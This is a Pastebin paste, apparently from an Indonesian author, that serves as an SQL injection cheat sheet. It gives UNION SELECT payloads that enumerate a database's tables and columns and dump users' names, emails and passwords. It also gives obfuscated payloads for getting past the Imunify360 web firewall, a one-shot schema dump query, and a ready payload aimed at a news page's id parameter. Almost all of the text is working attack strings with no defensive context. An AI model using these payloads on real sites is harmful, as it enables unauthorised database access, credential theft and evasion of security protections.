API tools faq
paste
Advertisement
afrizalwahyuadi66

SQL Injection Tips and tricks

afrizalwahyuadi66
Sep 22nd, 2024 (edited)
79
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.35 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. SUPPORT ME IN       : --> https://salamedia.id
  2. JUST VISIT SITE     : --> https://jawabaratcyber.com
  3.  
  4.  
  5. CHEATSHEET SQLI
  6. ===============
  7.  
  8. -   -- : MySQL Linux Style
  9. -  --+ : MySQL Windows Style
  10. -    # : Hash (URL encode while use)
  11. - --+- : SQL Comment
  12. - ;%00 : Null Byte
  13. -    ` : Backtick
  14.  
  15. -  2' order by 1--+- : Normal
  16. -  2' order by 2--+- : Normal
  17. -  2' order by 3--+- : Normal
  18. -  2' order by 4--+- : Error
  19.  
  20. -  https://example.com/index.php=' union select 1,2,3--+-
  21.  
  22. -  https://example.com/index.php=2' union select 1,@@version,3--+-
  23. ---------------------------------------------------
  24. -   @@version — menampilkan Versi database
  25. -   user() — menampilkan Nama User database
  26. -   @@hostname — menampilkan Hostname
  27. -   @@tmpdir — menampilkan Direktori temp
  28. -   @@datadir — menampilkan Direktori data
  29. -   @@basedir — menampilkan Direktori base
  30. -   database() — menampilkan Nama Database
  31. -   schema() — menampilkan Database yang dipakai
  32. -   session_user() — menampilkan Session User
  33. -------------------------------------------------
  34.  
  35. - https://example.com/index.php=2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+-
  36.  
  37. - https://example.com/index.php=2' union select 1,group_concat(column_name),3 from information_schema.columns where table_name="Users" --+-
  38.  
  39. - https://example.com/index.php=2' union select 1,group_concat(id,0x3a,Name,0x3a,Age,0x3a,Rank,0x3a,Email,0x3a,Password),3 from Users --+-
  40.  
  41. - https://example.com/index.php=2' union select 1,group_concat('Name:+',Name,'<br>Email:+',Email,'<br>Password:+',Password,'<br>------</br>'),3 from Users --+-
  42.  
  43. ------------------+
  44. BYPASS IMUNIFY360 |
  45. ------------------+
  46. - UNION SELECT
  47. /*!50000UnIoN*/ /*!50000SeLeCt*/
  48.  
  49. - COMMAND
  50. user/**_**/()
  51. database/**_**/()
  52.  
  53. - DIOS (DUMP IN ONE SHOOT)
  54. (/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat%0a(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a)
  55.  
  56. - USED
  57. berita-detail.php?id=3' /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,user/**_**/(),(/*!50000select*/+concat+(@:=0,(/*!50000select*/+count(*) from+/*!50000information_schema.tables*/+WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND@:=concat+(@,0x3c62723e,/*!50000table_name*/)),@)),5,6--+-
Tags: cybersecurity sqli Payload
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!